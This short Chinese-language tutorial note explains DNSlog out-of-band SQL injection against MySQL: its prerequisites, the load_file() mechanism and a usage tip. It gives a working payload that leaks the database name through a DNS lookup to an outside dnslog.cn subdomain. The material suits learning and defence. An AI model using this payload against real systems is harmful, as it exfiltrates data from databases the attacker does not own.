我们都知道延时盲注如果使用手工的方式,又费事又费力,即使使用工具同样很慢,所以出现了一种比较快速的注入方式,就是dns_load注入
使用dns_log注入需要满足两个条件
1.需要一个自己的dns域名服务器
2.需要在my.conf中加入secure_file_priv= (空)
因为这种注入方式的原理是通过数据库函数load_file(),通过函数发送请求,将sql语句查询的结果带出来给我们自己设置的DNS服务器解析,通过日志记录可以看到sql语句查询信息
在dnslog获取域名
paylod:id=1 and (select load_file(concat("\\\\",(select database()),".f1katv.dnslog.cn\\abc")))
注意点:不要踩坑,一定要在and的子查询里进行查询,或者使用union,否则无法达到解析效果